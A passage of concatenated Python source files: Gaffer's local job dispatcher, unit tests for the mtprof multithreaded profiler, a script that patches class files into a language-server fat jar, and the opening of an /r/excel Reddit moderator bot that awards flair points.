pid = batch.blindData().get( "pid" )
try :
stats = subprocess.Popen( ( "ps -Ao pid,ppid,pgid,sess,pcpu,rss" ).split( " " ), stdout=subprocess.PIPE, stderr=subprocess.PIPE ).communicate()[0].split()
for i in range( 0, len(stats), 6 ) :
if str(pid) in stats[i:i+4] :
pcpu += float(stats[i+4])
rss += float(stats[i+5])
except :
return {}
return {
"pid" : pid,
"pcpu" : pcpu,
"rss" : rss,
}
def messageHandler( self ) :
return self.__messageHandler
def execute( self, background = False ) :
if background :
threading.Thread( target = self.__backgroundDispatch ).start()
else :
with self.__messageHandler :
self.__foregroundDispatch( self.__batch )
self.__reportCompleted( self.__batch )
def failed( self ) :
return self.__getStatus( self.__batch ) == LocalDispatcher.Job.Status.Failed
def kill( self ) :
if not self.failed() :
self.__kill( self.__batch )
def killed( self ) :
return "killed" in self.__batch.blindData().keys()
def _fail( self ) :
self.__setStatus( self.__batch, LocalDispatcher.Job.Status.Failed )
def __kill( self, batch ) :
# this doesn't set the status to Killed because that could
# run into a race condition with a background dispatch.
batch.blindData()["killed"] = IECore.BoolData( True )
for upstreamBatch in batch.preTasks() :
self.__kill( upstreamBatch )
def __foregroundDispatch( self, batch ) :
for upstreamBatch in batch.preTasks() :
if not self.__foregroundDispatch( upstreamBatch ) :
return False
if batch.blindData().get( "killed" ) :
self.__reportKilled( batch )
return False
if not batch.plug() or self.__getStatus( batch ) == LocalDispatcher.Job.Status.Complete :
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
description = "executing %s on %s" % ( batch.blindData()["nodeName"].value, str(batch.frames()) )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, description )
try :
self.__setStatus( batch, LocalDispatcher.Job.Status.Running )
batch.execute()
except :
traceback.print_exc()
self.__reportFailed( batch )
return False
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
def __backgroundDispatch( self ) :
with self.__messageHandler :
self.__doBackgroundDispatch( self.__batch )
def __doBackgroundDispatch( self, batch ) :
if self.__getStatus( batch ) == LocalDispatcher.Job.Status.Complete :
return True
for upstreamBatch in batch.preTasks() :
if not self.__doBackgroundDispatch( upstreamBatch ) :
return False
if batch.blindData().get( "killed" ) :
self.__reportKilled( batch )
return False
if not batch.plug() :
self.__reportCompleted( batch )
return True
if len( batch.frames() ) == 0 :
# This case occurs for nodes like TaskList and TaskContextProcessors,
# because they don't do anything in execute (they have empty hashes).
# Their batches exist only to depend on upstream batches. We don't need
# to do any work here, but we still signal completion for the task to
# provide progress feedback to the user.
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Finished " + batch.blindData()["nodeName"].value )
return True
taskContext = batch.context()
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
args = [
"gaffer", "execute",
"-script", self.__scriptFile,
"-nodes", batch.blindData()["nodeName"].value,
"-frames", frames,
]
args = shlex.split( self.__environmentCommand ) + args
if self.__ignoreScriptLoadErrors :
args.append( "-ignoreScriptLoadErrors" )
contextArgs = []
for entry in [ k for k in taskContext.keys() if k != "frame" and not k.startswith( "ui:" ) ] :
if entry not in self.__context.keys() or taskContext[entry] != self.__context[entry] :
contextArgs.extend( [ "-" + entry, repr(taskContext[entry]) ] )
if contextArgs :
args.extend( [ "-context" ] + contextArgs )
self.__setStatus( batch, LocalDispatcher.Job.Status.Running )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, " ".join( args ) )
process = subprocess.Popen( args, start_new_session=True )
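# `start_new_session=True` makes the child the leader of a new process group,
# so its pid doubles as the process-group id passed to os.killpg() below.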
batch.blindData()["pid"] = IECore.IntData( process.pid )
while process.poll() is None :
if batch.blindData().get( "killed" ) :
os.killpg( process.pid, signal.SIGTERM )
self.__reportKilled( batch )
return False
time.sleep( 0.01 )
if process.returncode :
self.__reportFailed( batch )
return False
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
return True
def __getStatus( self, batch ) :
return LocalDispatcher.Job.Status( batch.blindData().get( "status", IECore.IntData( int(LocalDispatcher.Job.Status.Waiting) ) ).value )
def __setStatus( self, batch, status, recursive = False ) :
batch.blindData()["status"] = IECore.IntData( int(status) )
if recursive :
for upstreamBatch in batch.preTasks() :
self.__setStatus( upstreamBatch, status, recursive = True )
def __reportCompleted( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Complete )
self.__dispatcher.jobPool()._remove( self )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Dispatched all tasks for " + self.name() )
def __reportFailed( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Failed )
self.__dispatcher.jobPool()._fail( self )
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
IECore.msg( IECore.MessageHandler.Level.Error, self.__messageTitle, "Failed to execute " + batch.blindData()["nodeName"].value + " on frames " + frames )
def __reportKilled( self, batch ) :
self.__setStatus( batch, LocalDispatcher.Job.Status.Killed )
self.__dispatcher.jobPool()._remove( self )
IECore.msg( IECore.MessageHandler.Level.Info, self.__messageTitle, "Killed " + self.name() )
def __currentBatch( self, batch ) :
if self.__getStatus( batch ) == LocalDispatcher.Job.Status.Running :
return batch
for upstreamBatch in batch.preTasks() :
batch = self.__currentBatch( upstreamBatch )
if batch is not None :
return batch
return None
def __storeNodeNames( self, script, batch ) :
if batch.plug() :
batch.blindData()["nodeName"] = batch.plug().node().relativeName( script )
for upstreamBatch in batch.preTasks() :
self.__storeNodeNames( script, upstreamBatch )
class JobPool( IECore.RunTimeTyped ) :
def __init__( self ) :
self.__jobs = []
self.__failedJobs = []
self.__jobAddedSignal = Gaffer.Signal1()
self.__jobRemovedSignal = Gaffer.Signal1()
self.__jobFailedSignal = Gaffer.Signal1()
def jobs( self ) :
return list(self.__jobs)
def failedJobs( self ) :
return list(self.__failedJobs)
def waitForAll( self ) :
while len(self.__jobs) :
time.sleep( 0.2 )
def jobAddedSignal( self ) :
return self.__jobAddedSignal
def jobRemovedSignal( self ) :
return self.__jobRemovedSignal
def jobFailedSignal( self ) :
return self.__jobFailedSignal
def _append( self, job ) :
assert( isinstance( job, LocalDispatcher.Job ) )
self.__jobs.append( job )
self.jobAddedSignal()( job )
def _remove( self, job, force = False ) :
if job in self.__jobs :
self.__jobs.remove( job )
self.jobRemovedSignal()( job )
if force and job in self.__failedJobs :
self.__failedJobs.remove( job )
def _fail( self, job ) :
if job in self.__jobs and job not in self.__failedJobs :
job._fail()
self.__failedJobs.append( job )
self.jobFailedSignal()( job )
self._remove( job )
__jobPool = JobPool()
@staticmethod
def defaultJobPool() :
return LocalDispatcher.__jobPool
def jobPool( self ) :
return self.__jobPool
def _doDispatch( self, batch ) :
job = LocalDispatcher.Job(
batch = batch,
dispatcher = self,
name = Gaffer.Context.current().substitute( self["jobName"].getValue() ),
jobId = os.path.basename( self.jobDirectory() ),
directory = self.jobDirectory(),
)
self.__jobPool._append( job )
job.execute( background = self["executeInBackground"].getValue() )
IECore.registerRunTimeTyped( LocalDispatcher, typeName = "GafferDispatch::LocalDispatcher" )
IECore.registerRunTimeTyped( LocalDispatcher.JobPool, typeName = "GafferDispatch::LocalDispatcher::JobPool" )
GafferDispatch.Dispatcher.registerDispatcher( "Local", LocalDispatcher )
|
test_mtprof.py
|
import gc
import io
import logging
import os
import pstats
import sys
import subprocess
import threading
import tempfile
import time
import timeit
import unittest
import mtprof
def consume_cpu_simple(delay):
deadline = time.monotonic() + delay
while time.monotonic() < deadline:
pass
def run_until(deadline):
while time.monotonic() < deadline:
pass
def consume_cpu(duration, ncalls):
now = time.monotonic()
for i in range(ncalls):
deadline = now + duration * (i + 1) / ncalls
run_until(deadline)
def f(duration, ncalls):
consume_cpu(duration, ncalls)
def g(duration, ncalls):
consume_cpu(duration, ncalls)
def h(duration, ncalls):
consume_cpu(duration, ncalls)
class TestInternals(unittest.TestCase):
"""
Test internal functions
"""
def test_default_timer(self):
DELAY = 1.4
TOL = 0.2
f = mtprof._default_timer()
t1 = f()
consume_cpu_simple(DELAY)
dt = f() - t1
self.assertGreaterEqual(dt, DELAY - TOL)
self.assertLessEqual(dt, DELAY + TOL)
t = threading.Thread(target=consume_cpu_simple, args=(DELAY,))
t1 = f()
t.start()
t.join()
dt = f() - t1
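# The CPU burn ran in a separate thread, so the per-thread timer returned by
# mtprof._default_timer() is expected to barely advance for this thread.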
self.assertLess(dt, 0 + TOL)
class BaseProfilingTest:
def get_function_key(self, func):
try:
code = func.__code__
except AttributeError:
return "", 0, func.__name__
else:
return code.co_filename, code.co_firstlineno, code.co_name
def get_function_repr(self, func, strip_dirs=False):
try:
code = func.__code__
except AttributeError:
raise
else:
# filename:lineno(function)
filename = code.co_filename
if strip_dirs:
filename = os.path.basename(filename)
return "%s:%d(%s)" % (filename, code.co_firstlineno, code.co_name)
def check_function(self, stats, func):
key = self.get_function_key(func)
self.assertIn(key, stats, sorted(stats))
return stats[key]
def check_function_durations(self, stats, func, ncalls, duration):
st = self.check_function(stats, func)
cc, nc, tt, ct, callers = st
self.assertEqual(nc, ncalls)
self.assertLessEqual(ct, duration * 1.5)
self.assertGreaterEqual(ct, duration * 0.8)
return st
def check_in_pstats_output(self, lines, func, ncalls, strip_dirs=True):
"""
Given *lines* output by pstats, check that *func* is mentioned
with *ncalls* total function calls.
"""
look_for = self.get_function_repr(func, strip_dirs)
for line in lines:
parts = line.strip().split()
if parts and parts[-1] == look_for:
break
else:
self.fail("could not find %r in %r" % (look_for, lines))
nc, tt, percall, ct, cumpercall = parts[:5]
nc = int(nc.partition('/')[0])
tt = float(tt)
ct = float(ct)
self.assertEqual(nc, ncalls)
return tt, ct
def check_in_pstats(self, pstats_arg, func, ncalls):
sio = io.StringIO()
st = pstats.Stats(pstats_arg, stream=sio)
st.sort_stats('cumtime').print_stats(20)
return self.check_in_pstats_output(sio.getvalue().splitlines(),
func, ncalls,
strip_dirs=False)
class TestSingleThread(BaseProfilingTest, unittest.TestCase):
"""
Single-thread tests of the Python API.
"""
DURATION = 0.2
NCALLS = 4
def profiler(self):
prof = mtprof.Profile()
self.addCleanup(prof.close)
return prof
def check_stats(self, stats, nruns=1):
self.check_function_durations(stats, f, nruns, self.DURATION)
st = self.check_function_durations(stats, run_until,
self.NCALLS * nruns, self.DURATION)
cc, nc, tt, ct, callers = st
key = self.get_function_key(consume_cpu)
self.assertEqual(list(callers), [key])
def test_enable_disable(self):
prof = self.profiler()
prof.enable()
f(self.DURATION, self.NCALLS)
prof.disable()
prof.create_stats()
self.check_stats(prof.stats)
def test_enable_disable_twice(self):
prof = self.profiler()
prof.enable()
f(self.DURATION / 2, self.NCALLS)
prof.disable()
prof.enable()
f(self.DURATION / 2, self.NCALLS)
prof.disable()
prof.create_stats()
self.check_stats(prof.stats, 2)
def test_runcall(self):
prof = self.profiler()
prof.runcall(f, self.DURATION, ncalls=self.NCALLS)
prof.create_stats()
self.check_stats(prof.stats)
def test_run(self):
import __main__
__main__.some_global_name = f
prof = self.profiler()
prof.run("some_global_name(%r, %r)" % (self.DURATION, self.NCALLS))
prof.create_stats()
self.check_stats(prof.stats)
def test_runctx(self):
prof = self.profiler()
prof.runctx("f(duration, ncalls)",
dict(f=f),
dict(duration=self.DURATION, ncalls=self.NCALLS))
prof.create_stats()
self.check_stats(prof.stats)
def test_pstats(self):
prof = self.profiler()
prof.runcall(f, self.DURATION, ncalls=self.NCALLS)
tt, ct = self.check_in_pstats(prof, run_until, ncalls=self.NCALLS)
self.assertLessEqual(ct, self.DURATION * 1.5)
self.assertGreaterEqual(ct, self.DURATION * 0.8)
def test_finalizer(self):
prof = mtprof.Profile()
prof.close()
prof = mtprof.Profile()
del prof
gc.collect()
prof = mtprof.Profile()
prof.close()
class TestMultiThread(BaseProfilingTest, unittest.TestCase):
"""
Multi-thread tests of the Python API.
"""
DURATIONS = {f: 0.4,
g: 0.1,
h: 0.8}
NCALLS = 4
def profiler(self):
prof = mtprof.Profile()
self.addCleanup(prof.close)
return prof
def check_nominal_stats(self, stats):
func_durations = {}
for func in (f, g, h):
cc, nc, tt, ct, callers = self.check_function(stats, func)
self.assertEqual(nc, 1)
func_durations[func] = ct
# Since we're measuring per-thread CPU time and there's the GIL,
# each function's measurement is an unstable fraction of its wall
# clock time duration.
# Therefore only check 1) relative order 2) total summed duration
self.assertLessEqual(func_durations[g], func_durations[f])
self.assertLessEqual(func_durations[f], func_durations[h])
expected_duration = max(self.DURATIONS.values())
total_duration = sum(func_durations.values())
self.assertGreaterEqual(total_duration, expected_duration * 0.6)
self.assertLessEqual(total_duration, expected_duration * 1.8)
self.check_function_durations(stats, run_until, self.NCALLS * 3,
expected_duration)
def nominal_workload(self, nruns=1):
threads = [threading.Thread(target=func,
args=(self.DURATIONS[func], self.NCALLS))
for func in (g, h)]
for t in threads:
t.start()
f(self.DURATIONS[f], self.NCALLS)
for t in threads:
t.join()
def test_enable_disable(self):
prof = self.profiler()
prof.enable()
self.nominal_workload()
prof.disable()
prof.create_stats()
self.check_nominal_stats(prof.stats)
# XXX add tests for warnings with unhandled threads
class TestCLI(BaseProfilingTest, unittest.TestCase):
def run_cli(self, args, retcode=0):
command = [sys.executable, '-m', 'mtprof'] + args
proc = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True,
timeout=10)
if proc.returncode != retcode:
print("------- Process stdout --------")
print(proc.stdout)
print("------- Process stderr --------")
print(proc.stderr)
self.assertEqual(proc.returncode, retcode)
return proc
def make_tempfile(self, suffix=None):
fd, name = tempfile.mkstemp(prefix='test_mprof_', suffix=suffix)
os.close(fd)
self.addCleanup(os.unlink, name)
return name
def timeit_args(self):
timeit_args = ['-n', '800', '-r', '2',
'-s', 'import logging', 'logging.getLogger("foo")']
return timeit_args
def timeit_check(self, lines):
self.check_in_pstats_output(lines, logging.getLogger, 1600)
def test_basic(self):
proc = self.run_cli([], retcode=2)
proc = self.run_cli(['-m'], retcode=2)
def test_timeit_module(self):
"""
python -m mtprof -m timeit ...
"""
proc = self.run_cli(['-m', 'timeit'] + self.timeit_args())
self.timeit_check(proc.stdout.splitlines())
self.assertFalse(proc.stderr)
def test_timeit_script(self):
"""
python -m mtprof /xxx/timeit.py ...
"""
proc = self.run_cli([timeit.__file__] + self.timeit_args())
self.timeit_check(proc.stdout.splitlines())
self.assertFalse(proc.stderr)
def test_outfile(self):
outfile = self.make_tempfile(suffix='.prof')
proc = self.run_cli(['-o', outfile, '-m', 'timeit'] + self.timeit_args())
self.assertFalse(proc.stderr)
sio = io.StringIO()
stats = pstats.Stats(outfile, stream=sio)
stats.strip_dirs()
stats.sort_stats('time')
stats.print_stats(30)
self.timeit_check(sio.getvalue().splitlines())
if __name__ == "__main__":
unittest.main()
|
uf.py
|
#!/usr/bin/env python3
"""This script updates individual class files in a language
and diagram server fat jar that has already been created.
"""
# FIXME: Ideally this should be a TypeScript file written in a
# style consistent with build_lds.ts.
import os
import shutil
import argparse
import subprocess
import time
import threading
import tempfile
__author__ = "Peter Donovan"
__email__ = "[email protected]"
# This is the path to the fat jar that is to be updated.
FAT_JAR = os.path.join('lib', 'lflang-lds.jar')
LF_REPO_NAME = 'lingua-franca' # FIXME: Duplicates of config.ts
def main(args):
t0 = time.time()
n = 0
count_thread = threading.Thread(target=count)
count_thread.start()
try:
for src_dir_name in ('src', 'xtend-gen'):
directory = get_directory(args.name, src_dir_name)
condition = lambda f: (
os.path.isfile(os.path.join(directory, f))
and compiler(f) is not None
)
if not directory:
class_name_start = args.name.rindex('.')
directory = get_directory(
args.name[:class_name_start],
src_dir_name
)
previous_condition = condition
condition = lambda f: (
previous_condition(f) and (
os.path.splitext(os.path.basename(f))[0]
== args.name[(class_name_start+1):]
)
)
if not directory: continue
files = list(filter(condition, os.listdir(directory)))
update_fat_jar(directory, files)
n += len(files)
if n == 0:
error('The package or file specified could not be found.')
else:
success('{} SOURCE FILE{} UPDATED in {:.0f} seconds.'.format(
n,
('' if n == 1 else 'S'),
time.time() - t0
))
finally:
count_thread.terminate = True
# ~~~~~~~~~~~~~~~ Compilation-related logic ~~~~~~~~~~~~~~~~
def update_fat_jar(directory, files):
"""Updates the language server fat jar with the specified Java and/or
Kotlin files.
:param directory: the directory in which the given files live
:param files: the names of the files to be updated
"""
if not files: return
fat_jar_abs = os.path.join(get_repo_root(), FAT_JAR)
output_dir = os.path.join(tempfile.gettempdir(), 'org.lflang.lds', 'src')
for file in files:
compiler(file)(fat_jar_abs, directory, file, output_dir)
class_files = [
os.path.relpath(artifact, output_dir)
for artifact in files_with_extension(output_dir, '.class')
]
clean_print('Updating fat jar with {}...'.format(', '.join([
os.path.basename(class_file) for class_file in class_files
])))
check_call(
['jar', 'uf', fat_jar_abs, *class_files],
cwd=output_dir
)
# This is not safe from symlink attacks!
shutil.rmtree(output_dir)
def compiler(file):
if file.endswith('.kt'):
return compile_kotlin
if file.endswith('.java'):
return compile_java
def _javac_like_compiler(name):
def compiler(classpath, directory, file, output_dir):
clean_print('Compiling {}...'.format(file))
check_call(
[name, '-cp', classpath, '-d', output_dir, file],
cwd=directory,
shell=(os.name == 'nt') # True iff the OS is Windows.
)
return compiler
def check_call(*args, **kwargs):
command = args[0][0]
if shutil.which(command) is not None:
subprocess.check_call(*args, **kwargs)
else:
error(
"The command {} could not be found. Is {} installed and on your "
"path?".format(command, command)
)
exit(1)
compile_java = _javac_like_compiler('javac')
"""Compiles the Java file `file`.
:param classpath: an absolute path to a jar containing all files
needed by this file
:param directory: the directory in which the Java file lives
:param file: the name of the Java file
"""
compile_kotlin = _javac_like_compiler('kotlinc')
"""Compiles the Kotlin file `file`.
:param classpath: an absolute path to a jar containing all files
needed by this file
:param directory: the directory in which the Kotlin file lives
:param file: the name of the Kotlin file
"""
# ~~~~~~~~~~~~~~~ File system-related logic ~~~~~~~~~~~~~~~~
def files_with_extension(directory, extension):
for dirpath, dirnames, filenames in os.walk(directory):
for filename in filenames:
if os.path.splitext(filename)[1] == extension:
yield os.path.join(dirpath, filename)
def get_directory(package_name, src_dir_name):
"""Returns the directory associated with the module that has the
given canonical name. Returns None if there is no such directory.
:param package_name: the canonical name of the desired package
"""
parts = package_name.split('.')
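# For example (hypothetical package name), 'org.lflang.generator' would be probed
# as <lf repo>/org/src/org/lflang/generator, then <lf repo>/org.lflang/src/org/lflang/generator,
# and so on, trying progressively longer dotted prefixes as the subproject directory.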
def get_directory(subproject_len, src_dir_name):
return os.path.join(
get_lf_repo_root(),
'.'.join(parts[:subproject_len]),
src_dir_name, *parts
)
subproject_len = 0
while subproject_len <= len(parts):
subproject_len += 1
path = get_directory(subproject_len, src_dir_name)
if os.path.isdir(path):
return path # The path leads to a package.
def get_repo_root():
"""Returns the absolute path to the root of the repository in which
this script was invoked.
"""
return get_suitable_parent(
lambda path: os.path.isdir(os.path.join(path, '.git'))
)
def get_lf_repo_root():
"""Returns the absolute path to the root of the lingua-franca
repository.
"""
return os.path.join(get_repo_root(), LF_REPO_NAME)
def get_src_directory(path):
"""Returns a path to the parent `src` directory of the specified
path.
"""
return get_suitable_parent(
lambda path: os.path.basename(path) == 'src',
path
)
def get_suitable_parent(condition, path='.'):
assert path != os.pardir, 'Could not find the requested parent directory.'
if condition(path):
return os.path.abspath(path)
return get_suitable_parent(condition, get_parent_dir(path))
def get_parent_dir(path):
"""Returns the parent directory of the file denoted by `path`."""
return os.path.abspath(os.path.join(path, os.pardir))
# ~~~~~~~~~~~~~~~ Printing-related logic ~~~~~~~~~~~~~~~~
def get_clean_print(n_chars_to_overwrite):
def clean_print(message, r=255, g=255, b=255, end='\n'):
difference = n_chars_to_overwrite - len(message + end)
print(colored(r, g, b, message), end='')
if end in ('\r', '\n'):
print(' ' * difference, end=end)
if end == '\r':
return get_clean_print(len(message))
elif end == '\n':
return get_clean_print(0)
else:
return get_clean_print(difference)
return clean_print
class Printer:
def __init__(self):
self._clean_print = get_clean_print(0)
def clean_print(self, message):
self._clean_print = self._clean_print(message)
def progress(self, message):
self._clean_print = self._clean_print(message, 255, 255, 0, end='\r')
def error(self, message):
self._clean_print = self._clean_print('[ERROR]', 255, 0, 0, end=' ')
self._clean_print = self._clean_print(message)
def success(self, message):
self._clean_print = self._clean_print(
'SUCCESS: {}'.format(message), 100, 255, 0
)
def count(self):
t0 = time.time()
while not getattr(threading.current_thread(), 'terminate', False):
self.progress('Elapsed time: {:.0f} seconds'.format(time.time() - t0))
time.sleep(0.1)
_printer = Printer()
clean_print = _printer.clean_print
progress = _printer.progress
error = _printer.error
success = _printer.success
count = _printer.count
def colored(r, g, b, text):
return '\033[38;2;{};{};{}m{} \033[38;2;255;255;255m'.format(r, g, b, text)
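# Illustrative example: colored(255, 0, 0, 'failed') returns
# '\033[38;2;255;0;0mfailed \033[38;2;255;255;255m', i.e. a 24-bit ANSI escape
# that renders the text red and then switches the foreground back to white.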
# ~~~~~~~~~~~~~~~ Entry point ~~~~~~~~~~~~~~~~
if __name__ == '__main__':
argParser = argparse.ArgumentParser(
description='This script updates individual class files in a '
'language and diagram server fat jar that has '
'already been created.'
)
argParser.add_argument(
'-jar', default='jar',
help='override jar command to adjust java version, e.g. '
'/usr/lib/jvm/java-11-openjdk-amd64/bin/jar'
)
argParser.add_argument(
'name',
help='Class or module to recompile, specified by its canonical name.'
)
main(argParser.parse_args())
|
superclippy.py
|
#/u/GoldenSights
import sys
import traceback
import time
import datetime
import sqlite3
import json
import praw
'''USER CONFIGURATION'''
"""GENERAL"""
APP_ID = ""
APP_SECRET = ""
APP_URI = ""
APP_REFRESH = ""
# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/
USERAGENT = "/r/Excel Clippy Office Assistant all-in-one moderator."
# This is a short description of what the bot does.
# For example "/u/GoldenSights' Newsletter bot"
SUBREDDIT = "Goldtesting"
# This is the sub or list of subs to scan for new posts.
# For a single sub, use "sub1".
# For multiple subreddits, use "sub1+sub2+sub3+..."
PLAY_BOOT_SOUND = True
#Play boot.wav
MAXPOSTS = 100
# How many posts to get from the /new queue at once
WAIT = 30
# The number of seconds between cycles. The bot is completely inactive during
# this time
"""**************"""
"""CLIPPYPOINTS™ """
"""**************"""
POINT_STRING_USR = ["Solution Verified"]
# OP can use this string to award points in his thread.
POINT_STRING_MOD = ["+1 Point"]
# Moderators can use this to give points at any time.
POINT_FLAIR_CSS = "points"
# The CSS class associated with point flair
# Set to "" for none
POINT_REPLY = "You have awarded one point to _parent_"
# This is the phrase that User will receive
# _parent_ will be replaced by the username of the Parent.
POINT_EXEMPT = []
# Any usernames in this list will not receive points.
# Perhaps they have special flair.
POINT_OP_ONLY = True
# Is OP the only person who can give points?
# I recommend setting this to False. Other users might have the same question
# and would like to reward a good answer.
POINT_PER_THREAD = 200
# How many points can be distributed in a single thread?
POINT_DO_EXPLAIN = True
# If the max-per-thread is reached and someone tries to give a point, reply to
# them saying that the max has already been reached
POINT_EXPLAIN = """
Sorry, but %d point(s) have already been distributed in this thread.
This is the maximum allowed at this time.
"""%POINT_PER_THREAD
# If POINT_DO_EXPLAIN is True, this will be said to someone who tries to give a
# point after the max is reached
POINT_EXPLAIN_OP_ONLY = """
Hi!
It looks like you are trying to award a point and you are not the OP!
I am here to assist you!
What would you like help with?
[ClippyPoints^(TM)?](/r/excel/wiki/clippy)
[Flair Descriptions](http://www.reddit.com/r/excel/wiki/index)
"""
"""**************"""
"""FLAIR REMINDER"""
"""**************"""
FLAIR_WARN_DELAY = 86400
# This is the time, IN SECONDS, the user has to reply to the first comment.
# If he does not respond by this time, post is removed
NCDELAY = 172800
FLAIR_WARN_MESSAGE = """
Hi!
It looks like you are trying to ask a question!
Since you have not responded in the last 24 hours, I am here to assist you!
If your question has been solved, please be sure to update the flair.
Would you like help?
[Help Changing Your
Flair?](https://www.reddit.com/r/excel/wiki/flair)
[Asking Question and Sharing
Data](https://www.reddit.com/r/excel/wiki/sharingquestions)
"""
# This is what the bot tells you when you don't meet the DELAY. Uses reddit's
# usual Markdown formatting
FLAIR_IGNORE_MODS = False
# Do you want the bot to ignore posts made by moderators?
# Use True or False (With capitals! No quotations!)
FLAIR_IGNORE_SELF = False
#Do you want the bot to ignore selfposts?
FLAIR_SOLVED = "solved"
FLAIR_UNSOLVED = "unsolved"
FLAIR_CHAL = "challenge"
FLAIR_MANN = "Mod Announcement"
FLAIR_MNEWS = "Mod News"
FLAIR_WAITING = "Waiting on OP"
FLAIR_DISCUSS = "discussion"
FLAIR_ADVERTISEMENT = "advertisement"
FLAIR_TEMPLATE = "User Template"
FLAIR_PROTIP = "pro tip"
FLAIR_TRIGGERS = ["that works", "perfect", "thank you so much", "huge help",
"figured it out", "got it", "thanks for your help"]
#These encourage OP to change flair / award point
FLAIR_REMINDER = """
Hi!
It looks like you received an answer to your question! Since the post is
still marked as unsolved, I am here to assist you!
If your question has been solved, please be sure to update the flair.
Would you like help?
[Help Changing Your Flair?](http://www.reddit.com/r/excel/wiki/index)
[Flair Descriptions](http://www.reddit.com/r/excel/wiki/index)
"""
"""******************"""
"""FUNCTION REFERENCE"""
"""******************"""
DICT_TRIGGER = "clippy: "
# The trigger phrase for performing a lookup
DICT_FILE = 'reference.txt'
# The file with the Keys/Values
DICT_RESULT_FORM = "_value_"
# This is the form that the result will take
# You may use _key_ and _value_ to inject the key/value from the dict.
# You may delete one or both of these injectors.
DICT_LEVENSHTEIN = False
# If this is True it will use a function that is slow but can find
# misspelled keys
# If this is False it will use a simple function that is very fast but can
# only find keys which are spelled exactly
DICT_FAIL = """
Hi! It looks like you're looking for help with an Excel function!
Unfortunately I have not learned that function yet. If you'd like to
change that, [message the
moderators](http://www.reddit.com/message/compose?to=%2Fr%2Fexcel)!
"""
# The comment which is created when a function is requested
# but not in the file
"""***************"""
"""WELCOME MESSAGE"""
"""***************"""
WELCOME_SUBJECT = """Welcome to /r/Excel, I am here to help!"""
WELCOME_MESSAGE = """
Hi %s!
It looks like you are new to posting in /r/Excel.
Did you know we have a few ways to help you receive better help?
How can I help you?
[How to Share Your Questions](/r/excel/wiki/sharingquestions)
[Changing Link Flair](/r/excel/wiki/flair)
[ClippyPoints^TM](/r/excel/wiki/clippy)
^This ^message ^is ^auto-generated ^and ^is ^not ^monitored ^on ^a
^regular ^basis, ^replies ^to ^this ^message ^may ^go ^unanswered.
^Remember ^to [^contact ^the
^moderators](http://www.reddit.com/message/compose?to=%2Fr%2Fexcel)
^to ^guarantee ^a ^response
"""
# Sent to the user if he has created his first post in the subreddit
'''All done!'''
class ClippyPoints:
def incrementflair(self, subreddit, username):
#Returns True if the operation was successful
if isinstance(subreddit, str):
subreddit = r.get_subreddit(subreddit)
success = False
print('\t\tChecking flair for ' + username)
flairs = subreddit.get_flair(username)
flairs = flairs['flair_text']
if flairs is not None and flairs != '':
print('\t\t:' + flairs)
try:
flairs = int(flairs)
flairs += 1
flairs = str(flairs)
success = True
except ValueError:
print('\t\tCould not convert flair to a number.')
else:
print('\t\tNo current flair. 1 point')
flairs = '1'
success = True
if success:
print('\t\tAssigning Flair: ' + flairs)
subreddit.set_flair(username, flair_text=flairs,
flair_css_class=POINT_FLAIR_CSS)
return success
def receive(self, comments):
print('\tClippyPoints received comments.')
subreddit = r.get_subreddit(SUBREDDIT)
for comment in comments:
cid = comment.id
cur.execute('SELECT * FROM clippy_points WHERE ID=?', [cid])
if not cur.fetchone():
print(cid)
cbody = comment.body.lower()
try:
if not comment.is_root:
cauthor = comment.author.name
print('\tChecking subreddit moderators')
moderators = [user.name for user in subreddit.get_moderators()]
byuser = False
if cauthor not in moderators and any(flag.lower() in cbody for flag in POINT_STRING_USR):
byuser = True
if byuser or (
(cauthor in moderators and any(flag.lower() in cbody for flag in POINT_STRING_MOD))):
print('\tFlagged %s.' % cid)
print('\t\tFetching parent and Submission data.')
parentcom = r.get_info(thing_id=comment.parent_id)
pauthor = parentcom.author.name
op = comment.submission.author.name
opid = comment.submission.id
if pauthor != cauthor:
if not any(exempt.lower() == pauthor.lower() for exempt in POINT_EXEMPT):
if POINT_OP_ONLY is False or cauthor == op or cauthor in moderators:
cur.execute('SELECT * FROM clippy_points_s WHERE ID=?', [opid])
fetched = cur.fetchone()
if not fetched:
cur.execute('INSERT INTO clippy_points_s VALUES(?, ?)', [opid, 0])
fetched = 0
else:
fetched = fetched[1]
if fetched < POINT_PER_THREAD:
if self.incrementflair(subreddit, pauthor):
print('\t\tWriting reply')
comment_confirm = comment.reply(POINT_REPLY.replace('_parent_', pauthor))
comment_confirm.distinguish()
cur.execute('UPDATE clippy_points_s SET count=? WHERE ID=?', [fetched+1, opid])
if byuser:
comment.submission.set_flair(flair_text=FLAIR_SOLVED, flair_css_class="solvedcase")
else:
print('\t\tMaxPerThread has been reached')
if POINT_DO_EXPLAIN is True:
print('\t\tWriting reply')
comment.reply(POINT_EXPLAIN)
else:
print('\tOther users cannot give points.')
#comment_confirm = comment.reply(POINT_EXPLAIN_OP_ONLY)
#comment_confirm.distinguish()
else:
print('\t\tParent is on the exempt list.')
else:
print('\t\tCannot give points to self.')
else:
print('\t\tRoot comment. Ignoring.')
except AttributeError:
print('\t\tCould not fetch usernames. Cannot proceed.')
cur.execute('INSERT INTO clippy_points VALUES(?)', [cid])
sql.commit()
print('\tClippyPoints finished')
class ClippyFlairReminder:
def receive(self, posts):
print('\tClippyFlair received submissions')
now = datetime.datetime.now()
subreddit = r.get_subreddit(SUBREDDIT)
print('\tChecking subreddit moderators')
moderators = [user.name for user in subreddit.get_moderators()]
for post in posts:
found = False
ctimes = []
pid = post.id
try:
pauthor = post.author.name
except AttributeError:
pauthor = '[deleted]'
ptime = post.created_utc
curtime = getTime(True)
ctime = curtime
cur.execute('SELECT * FROM clippy_flair WHERE id=?', [pid])
